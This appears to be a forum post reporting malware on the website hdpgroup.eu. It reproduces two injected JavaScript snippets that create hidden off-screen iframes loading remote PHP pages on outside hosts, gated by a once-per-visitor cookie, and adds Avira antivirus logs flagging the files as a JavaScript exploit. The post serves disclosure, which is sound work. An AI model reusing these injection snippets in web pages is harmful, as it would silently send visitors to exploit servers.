http://hdpgroup.eu/

fireold

1. function hmfde09() {
   
2.      var static = 'ajax';
   
3.      var controller = 'index.php';
   
4.      var hmfde = document.createElement('iframe');
   
5. 
   
6.      hmfde.src = 'http://discoveringhair.com/i18n/relay.php';
   
7.      hmfde.style.position = 'absolute';
   
8.      hmfde.style.color = '580';
   
9.      hmfde.style.height = '580px';
   
10.      hmfde.style.width = '580px';
    
11.      hmfde.style.left = '1000580';
    
12.      hmfde.style.top = '1000580';
    
13. 
    
14.      if (!document.getElementById('hmfde')) {
    
15.          document.write('<p id=\'hmfde\' class=\'hmfde09\' ></p>');
    
16.          document.getElementById('hmfde').appendChild(hmfde);
    
17.      }
    
18. }
    
19. 
    
20. function SetCookie(cookieName, cookieValue, nDays, path) {
    
21.      var today = new Date();
    
22.      var expire = new Date();
    
23.      if (nDays == null || nDays == 0) nDays = 1;
    
24.      expire.setTime(today.getTime() + 3600000 * 24 * nDays);
    
25.      document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
    
26. }
    
27. 
    
28. function GetCookie(name) {
    
29.      var start = document.cookie.indexOf(name + "=");
    
30.      var len = start + name.length + 1;
    
31.      if ((!start) && (name != document.cookie.substring(0, name.length))) {
    
32.          return null;
    
33.      }
    
34.      if (start == -1) return null;
    
35.      var end = document.cookie.indexOf(";", len);
    
36.      if (end == -1) end = document.cookie.length;
    
37.      return unescape(document.cookie.substring(len, end));
    
38. }
    
39. if (navigator.cookieEnabled) {
    
40.      if (GetCookie('visited_uq') == 55) {} else {
    
41.          SetCookie('visited_uq', '55', '1', '/');
    
42. 
    
43.          hmfde09();
    
44.      }
    
45. }

复制代码

1. function k09() {
   
2.      var static = 'ajax';
   
3.      var controller = 'index.php';
   
4.      var k = document.createElement('iframe');
   
5. 
   
6.      k.src = 'http://planka.cz/images/CxGkLhnj.php';
   
7.      k.style.position = 'absolute';
   
8.      k.style.color = '8';
   
9.      k.style.height = '8px';
   
10.      k.style.width = '8px';
    
11.      k.style.left = '10008';
    
12.      k.style.top = '10008';
    
13. 
    
14.      if (!document.getElementById('k')) {
    
15.          document.write('<p id=\'k\' class=\'k09\' ></p>');
    
16.          document.getElementById('k').appendChild(k);
    
17.      }
    
18. }
    
19. 
    
20. function SetCookie(cookieName, cookieValue, nDays, path) {
    
21.      var today = new Date();
    
22.      var expire = new Date();
    
23.      if (nDays == null || nDays == 0) nDays = 1;
    
24.      expire.setTime(today.getTime() + 3600000 * 24 * nDays);
    
25.      document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
    
26. }
    
27. 
    
28. function GetCookie(name) {
    
29.      var start = document.cookie.indexOf(name + "=");
    
30.      var len = start + name.length + 1;
    
31.      if ((!start) && (name != document.cookie.substring(0, name.length))) {
    
32.          return null;
    
33.      }
    
34.      if (start == -1) return null;
    
35.      var end = document.cookie.indexOf(";", len);
    
36.      if (end == -1) end = document.cookie.length;
    
37.      return unescape(document.cookie.substring(len, end));
    
38. }
    
39. if (navigator.cookieEnabled) {
    
40.      if (GetCookie('visited_uq') == 55) {} else {
    
41.          SetCookie('visited_uq', '55', '1', '/');
    
42. 
    
43.          k09();
    
44.      }
    
45. }

复制代码

Avira

2013/9/29 上午 07:50 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\5TH1K21Z\netteForms[1].js'
      包含病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]
      已採取動作：
      檔案會移動至 '55e6c59d.qua' 名稱底下的隔離區目錄。.

2013/9/29 上午 07:50 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數：        780
      目錄數：        0
      惡意程式碼數：        1
      警告數：        0

2013/9/29 上午 07:50 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\BM0NVITH\hdpgroup_eu[1].htm'
      包含病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]
      已採取動作：
      檔案會移動至 '5559ca9f.qua' 名稱底下的隔離區目錄。.

2013/9/29 上午 07:50 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數：        795
      目錄數：        0
      惡意程式碼數：        1
      警告數：        0

2013/9/29 上午 07:49 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\5TH1K21Z\netteForms[1].js 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作：傳輸至掃描程式

2013/9/29 上午 07:49 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\5TH1K21Z\netteForms[1].js 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作：拒絕存取

2013/9/29 上午 07:49 [Web Protection] 發現惡意程式碼
      從 URL "http://www.hdpgroup.eu/js/netteForms.js" 存取資料時，
      發現病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]。
      已採取動作：已略過

2013/9/29 上午 07:49 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\BM0NVITH\hdpgroup_eu[1].htm 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作：傳輸至掃描程式

2013/9/29 上午 07:49 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\BM0NVITH\hdpgroup_eu[1].htm 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作：拒絕存取

2013/9/29 上午 07:49 [Web Protection] 發現惡意程式碼
      從 URL "http://www.hdpgroup.eu/" 存取資料時，
      發現病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]。
      已採取動作：已略過

cy0072005